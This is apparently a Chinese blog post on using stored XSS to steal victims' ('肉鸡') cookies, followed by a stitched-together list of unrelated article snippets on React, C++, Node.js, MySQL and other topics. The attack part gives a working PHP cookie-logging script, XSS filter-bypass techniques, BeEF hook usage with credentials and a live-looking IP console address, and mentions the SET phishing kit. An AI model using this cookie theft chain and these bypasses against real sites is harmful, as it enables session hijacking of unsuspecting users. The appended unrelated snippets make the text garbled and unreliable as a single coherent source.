XSS脚本(存储型xss获取肉鸡的cookies)
XSS脚本(存储型xss获取肉鸡的cookies)
存储型XSS就是在能够提交上传的文本框中提交一些标签代码,这段代码被插入到页面中,肉鸡每次点击这个页面时都会有弹框弹出。(只要点击就会弹框)
反射性XSS顾名思义插入
vim /var/www/html/cookie_rec.php
<?php $cookie = $_GET['cookie']; $log = fopen('cookie.txt',"a"); fwrite($log, $cookie . "\n"); fclose($log); ?>2、增加目录权限
chown -R www-data.www-data /var/www
3、访问靶机
4、之后,当有人访问这个页面时就会有弹框
存储型Xss排查思路:
1、首先依次排查标签是否被禁用(script、img、iframe等)
绕过思路:
标签大小写
标签转义、双重转义、加密
替换关键字
使用编码(十六进制、二次编码、Unicode编码)
2、测试排查某些符号是否被禁用转义(尖括号、引号、空格、等号)
绕过思路:
对符号进行编码
转义、双重转义、尖括号闭合
加密
使用注释
重音符(`)来包含代码
内嵌TAB、换行符等分割攻击代码
3、检查xss的验证机制,是通过前端验证或是后端验证、还是前后端均验证。
排查思路:
查看HTML源码前端是否存在某些限制文本框长度、符号分割(空格,逗号等)、标签禁用、符号禁用、标签符号过滤等JS或方法
使用burpsuite绕过前端,发起请求
4、针对1、2、3过程的排查,进行针对性的注入
常见注入:
标签闭合
注释、字符转义
事件处理程序
编码
协议绕过
内嵌(TAB、回车)
参考:https://www.freebuf.com/articles/web/153055.html
BeEf工具的使用:
注入的语句:
账号密码:beef : debian4eva
UI地址:http://139.198.21.183:8808/ui/authentication
setookit制作钓鱼网站工具
相关文章:
)
XSS脚本(存储型xss获取肉鸡的cookies)
XSS脚本(存储型xss获取肉鸡的cookies) 存储型XSS就是在能够提交上传的文本框中提交一些标签代码,这段代码被插入到页面中,肉鸡每次点击这个页面时都会有弹框弹出。(只要点击就会弹框) 反射性XSS顾名思义插入…...
【React】04.MVC模式和MVVM模式
React是Web前端框架 1、目前市面上比较主流的前端框架 ReactAngular(NG框架)Vue 主流的思想: 不在直接去操作DOM,而是改为“数据驱动思想” 操作DOM思想: 操作DOM比较消耗性能[主要原因就是,可能会导…...
调试代码0
dev_update_off () * read_image (Image, C:/Users/Public/Documents/MVTec/HALCON-12.0/examples/images/smd/smd_on_chip_01.png) read_image (Image, D:/图像文件/图片/图片/基板/20230609-103004-0.bmp) get_image_size (Image, Width, Height) * dev_close_window () * de…...
【C++心愿便利店】No.12---C++之探索string底层实现
文章目录 前言一、写实拷贝(了解)二、string类常用接口实现2.1 成员变量2.2 默认构造函数2.3 拷贝构造函数2.4 operator2.5 operator[]2.6 c_str2.7 size()2.8 capacity() 三、迭代器的实现3.1 begin()和end()3.2 范围for 四、string类增删查改4.1 reser…...
Android Studio(列表视图ListView)
前言 前面在适配器章节,已经介绍了ListView的作用(干什么的),这节将主要介绍如何去设计ListView页面视图。 思考 列表视图需要些什么? 1. 列表项容器(装载各列表项的容器):<ListView/> 2. 列表项布局…...
让深度神经网络绘画以了解它们是如何工作的
一、说明 深度学习如此有效,这真是一个谜。尽管有一些关于深度神经网络为何如此有效的线索,但事实是没有人完全确定,并且深度学习的理论理解是一个非常活跃的研究领域。 在本教程中,我们将以一种不寻常的方式触及问题的一个小方面…...
https://www.jianshu.com/p/34bf240b85a9
https://www.jianshu.com/p/34bf240b85a9 https://www.eccee.com/soft-platform/991.html...
如何导出PPT画的图为高清图片?插入到world后不压缩图像的设置方法?
期刊投稿的时候,需要图片保持一定的清晰度数,那么我们怎么才能从PPT中导出符合要求的图片呢? 对于矢量图绘图软件所画的图,直接导出即可。 而PPT导出的图片清晰度在60pi,就很模糊。 整体思路: PPT绘图——…...
【Spring】Spring IOC DI
Spring IOC & DI IOC DI入门什么是Spring什么是容器什么是IOC IOC介绍传统程序开发解决方案 DI IOC详解Bean的存储Controller(控制器存储)Service(服务存储)Repository(仓库存储)Component(组件存储)Configuration(配置存储) 为什么需要这么多类注解类注解之间的关系方法注…...
一招解密网络流量瓶颈!
前言 我们曾介绍过观测云提供全面的基础设施监测方案(参见《全方位监控基础设施,坚实守护您的业务稳定!》),能够高效全面地帮助您实时观测所有的基础设施对象及云产品等,赋能您的业务稳定发展。今天我们将…...
某校帮签到小程序m 加密参数解析
小程序解密清参考我以前的文章 VX小程序逆向 js版本 function n(e, a) {var t (65535 & e) (65535 & a);return (e >> 16) (a >> 16) (t >> 16) << 16 | 65535 & t };function i(e, a, t, n, r, i, s) {return o(a & n | t &…...
Node.js |(六)express框架 | 尚硅谷2023版Node.js零基础视频教程
学习视频:尚硅谷2023版Node.js零基础视频教程,nodejs新手到高手 文章目录 📚express使用🐇初体验🐇express路由⭐️路由的使用⭐️获取请求参数⭐️获取路由参数🔥练习:根据路由参数响应歌手信息…...
包教包会:Mysql主从复制搭建
笑小枫的专属目录 一、无聊的理论知识1. 主从复制原理2. 主从复制的工作过程3. MySQL四种同步方式 二、docker下安装、启动mysql1. 安装主库2. 安装从库 三、配置Master(主)四、配置Slave(从)五、链接Master(主)和Slave(从)六、主从复制排错1. 错误:error connectin…...
Subset Selection
白话解释:https://www.geeksforgeeks.org/feature-subset-selection-process/ 貌似有一种比较常见的方法,称为多元逐步回归有3种筛选自变量的方法 (1)向前法:n个因变量情况,慢慢增加因变量到方程中&#x…...
【测开求职】面试题:计算机网络 精简版整理
本篇文章整理的是在秋招过程中遇到的计算机网络高频面试题,应付部分中小厂的测试开发工程师面试完全没有问题,如果时间充足的话,建议再看一下笔者的另外一篇文章:【测开求职】面试题:计算机网络 详细版整理,会让你对整个计算机网络有足够全面深刻的理解,亲测应付各个大厂…...
)
设计模式-代理模式(delegate)
什么是代理? 代理(Proxy)是一种设计模式,提供了对目标对象另外的访问方式;即通过代理对象访问目标对象.这样做的好处是:可以在目标对象实现的基础上,增强额外的功能操作,即扩展目标对象的功能. 这里使用到编程中的一个思想:不要随意去修改别人已经写好的代码或者方…...
MongoDB 安装与配置
MongoDB 安装与配置 MongoDB 是一个高性能、开源的 NoSQL 数据库,它提供了丰富的查询功能和高可用性。本文将详细讲解 MongoDB 的安装与配置过程。 1. MongoDB 安装 1.1 Windows 平台安装 下载 MongoDB 安装包 访问 MongoDB 官方下载页面(https://w…...
rabbitMq创建交换机,以及路由键绑定队列教程
创建交换机: 创建队列: 创建路由,绑定到交换机:...
odoo16前端框架源码阅读——ormService.js
odoo16前端框架源码阅读——ormService.js 路径:addons\web\static\src\core\orm_service.js 简单翻译一下代码中的注释: ORM服务是js代码和python的ORM层通信的标准方法。 然后讲了One2many and Many2many特使的指令格式,每个指令都是3元…...
详谈滑动窗口算法与KMP算法区别以及二者在什么场景下使用
什么是滑动窗口算法 滑动窗口算法是一种用于解决数组(或字符串)中子数组(或子字符串)问题的算法。该算法通过维护一个固定大小的窗口(通常是两个指针),该窗口在数组上滑动,以寻找符…...
从ONNX到NCNN:Android端模型部署的完整环境搭建与转换实战
1. 环境准备:搭建Windows下的开发工具链 在开始ONNX到NCNN的模型转换之前,我们需要先配置好开发环境。这个过程就像盖房子前要准备砖块和水泥一样,缺一不可。我去年在给公司部署人脸识别模型时,就因为没有正确配置环境浪费了两天时…...
Phi-3.5-mini-instruct惊艳效果:对gRPC Protobuf IDL生成Go/Python双端代码
Phi-3.5-mini-instruct惊艳效果:对gRPC Protobuf IDL生成Go/Python双端代码 1. 模型概述与核心能力 Phi-3.5-mini-instruct是微软推出的轻量级开源指令微调大模型,在长上下文代码理解(RepoQA)、多语言MMLU等基准测试中表现优异。…...
)
手把手教你用Vivado 2019.1在Kintex-7上搭建10G UDP网卡(含SFP光口配置与巨型帧测试)
Kintex-7 FPGA实战:从零构建10G UDP光口网卡全流程解析 当我们需要在FPGA上实现高速网络通信时,10G以太网无疑是一个极具吸引力的选择。本文将带您完整走过在Kintex-7 FPGA上搭建10G UDP网卡的每一个步骤,从Vivado工程配置到SFP光口调试&…...
)
Xshell快捷键 vs. 原生Bash/终端:你的习惯真的高效吗?(含配置同步技巧)
Xshell快捷键与原生终端效率对比:跨平台工作流优化指南 终端操作效率直接决定了开发者的生产力水平。当你在Windows的Xshell、macOS的Terminal和Linux原生终端之间频繁切换时,是否经常因为快捷键差异而打乱工作节奏?这种跨平台操作带来的认知…...
)
GraalVM Native Image内存暴增紧急响应清单(含jcmd + native-image-agent + heapdump离线分析三件套)
第一章:GraalVM Native Image内存暴增的典型现象与根因认知当使用 GraalVM 的 native-image 工具将 Java 应用编译为原生可执行文件时,开发者常在构建阶段遭遇 JVM 堆内存急剧飙升(如从 2GB 涨至 16GB),甚至触发 OutOf…...
测试22222222
测试...
别再只盯着BLEU了!用CIDEr评价你的图像描述模型,效果更接近人类判断
图像描述模型评估新范式:为什么CIDEr比BLEU更能捕捉人类感知? 当你在深夜盯着BLEU分数陷入沉思——明明指标显示模型表现优异,为什么生成的图像描述读起来总差那么点"人味儿"?这个问题困扰过大多数计算机视觉研究者。传…...
K-Means聚类实战:从原理到可视化调优全解析
1. 初识K-Means:当数据遇到"分堆游戏" 第一次接触K-Means时,我把它想象成小朋友玩的分糖果游戏。假设桌上有100颗颜色各异的糖果,现在需要把它们分成几组。最直观的做法就是先随机指定几个"组长"(比如红、绿、…...
AI-MVP:以最小模型验证最大价值,聚焦AI智能体研究
MVP(Minimum Viable Product,最小可行产品)是一种产品开发方法论,指用最低成本、最快速度构建出具备核心功能、足以验证基本商业假设的产品初始版本。 其核心目的是通过收集早期用户反馈来验证市场需求,从而指导后续迭…...
Hutool TreeUtil 教程
一、简介Hutool 的 TreeUtil 是一个树结构工具类,用于处理节点数据构建树形结构(如菜单树、组织树、地区树等),支持无限级分类。二、核心概念2.1 关键类TreeNode: 树节点配置类,定义节点属性(id、parentId、…...